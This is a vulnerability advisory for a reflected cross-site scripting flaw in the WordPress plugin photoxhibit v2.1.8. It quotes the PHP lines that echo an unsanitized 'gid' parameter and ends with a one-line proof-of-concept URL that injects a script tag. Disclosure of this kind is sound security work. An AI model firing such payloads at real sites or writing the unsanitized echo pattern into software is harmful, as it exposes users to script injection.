Advisory #: 778
Title: Reflected XSS in wordpress plugin photoxhibit v2.1.8
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/photoxhibit
Downloads: 34643
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: photoxhibit
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./photoxhibit/common/inc/pages/edit_styles.php: 30:<form action="admin.php?page=px_manage&action=edit_styles&amp;do=editStyles&amp;gid=<?php echo $_GET['gid'];?>" method="post"> 36: <a class="editLinks" href="admin.php?page=px_manage&amp;action=edit_image_attr&amp;gid=<?php echo $_GET['gid'];?>"><?php _e('Edit Images', 'photoxhibit'); ?></a> 38: <a class="editLinks" href="admin.php?page=px_build&amp;gid=<?php echo $_GET['gid'];?>"><?php _e('Edit Gallery', 'photoxhibit'); ?></a> 48: <input type="hidden" name="gid" id="px_gid" value="<?php echo $_GET['gid'];?>"/> The variable gid appears to send unsanitized data back to the users browser.
CVE-ID: 2016-1000144
File:./photoxhibit/common/inc/pages/edit_styles.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/photoxhibit/common/inc/pages/edit_styles.php?gid="><script>alert(1);</script><"